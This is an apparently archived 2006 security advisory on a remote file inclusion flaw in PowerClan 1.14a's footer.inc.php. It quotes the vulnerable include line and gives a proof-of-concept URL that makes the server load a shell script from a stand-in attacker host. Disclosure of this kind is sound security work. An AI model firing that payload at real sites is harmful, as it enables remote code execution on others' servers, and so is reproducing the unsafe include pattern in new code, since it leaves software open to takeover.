id: 1284
date: 12/21/2006
title: PowerClan <= 1.14a (footer.inc.php) Remote File Include Vulnerability
author: nuffsaid
cves: 

=====================================================================
PowerClan <= 1.14a (footer.inc.php) Remote File Include Vulnerability
=====================================================================



+-------------------------------------------------------------------------------------------
+ PowerClan <= 1.14a (footer.inc.php) Remote File Include Vulnerability
+-------------------------------------------------------------------------------------------
+ Vendor ............: http://www.powerscripts.org/
+ Affected Software .: PowerClan <= 1.14a
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+-------------------------------------------------------------------------------------------
+ Details:
+ PowerClan footer.inc.php does not initialize the $settings[footer] variable before using it
+ to include files, assuming register_globals = on, we can initialize the variable in a query
+ string and include a remote file of our choice.
+
+ Vulnerable Code:
+ footer.inc.php, line(s) 24:
+ -> 24: include($settings[footer]);
+
+ Proof Of Concept:
+ http://[target]/[path]/footer.inc.php?settings[footer]=http://evilsite.com/shell.php
+-------------------------------------------------------------------------------------------


#  0day.today [2023-03-25]  #